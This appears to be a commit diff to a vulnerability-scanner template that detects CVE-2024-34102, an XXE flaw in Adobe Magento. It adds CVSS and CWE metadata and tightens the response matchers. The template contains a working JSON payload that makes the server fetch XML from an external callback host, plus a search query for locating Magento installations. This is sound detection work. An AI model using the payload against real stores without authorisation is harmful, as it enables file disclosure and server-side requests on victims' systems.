Update CVE-2024-34102.yaml
parent
d503a111ab
commit
7d6d3f301b
|
@ -9,10 +9,15 @@ info:
|
|||
reference:
|
||||
- https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
|
||||
- https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2024-34102
|
||||
cwe-id: CWE-611
|
||||
metadata:
|
||||
fofa-query: app="Adobe-Magento"
|
||||
verified: true
|
||||
max-request: 1
|
||||
fofa-query: app="Adobe-Magento"
|
||||
tags: cve,cve2024,adobe,magento,xxe
|
||||
|
||||
http:
|
||||
|
@ -24,19 +29,12 @@ http:
|
|||
|
||||
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(interactsh_protocol, "dns")'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "message") && contains(body, "log file")'
|
||||
- 'contains_any(body, "log file", "cartId", "no Route")'
|
||||
- 'contains(body, "message")'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(interactsh_protocol, "dns")'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "message") && contains(body, "cartId")'
|
||||
condition: and
|
||||
# digest: 490a0046304402203893e705a9d4cf9e7d7e2496277394f23d202b239760870ea9cadae68ebd9b07022003ab468c5e1c261ffb105d2d9b90ce330b27a1f0546ac68ad46b5b8e29c866ce:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402203893e705a9d4cf9e7d7e2496277394f23d202b239760870ea9cadae68ebd9b07022003ab468c5e1c261ffb105d2d9b90ce330b27a1f0546ac68ad46b5b8e29c866ce:922c64590222798bb761d5b6d8e72950
|
||||
|
|
Loading…
Reference in New Issue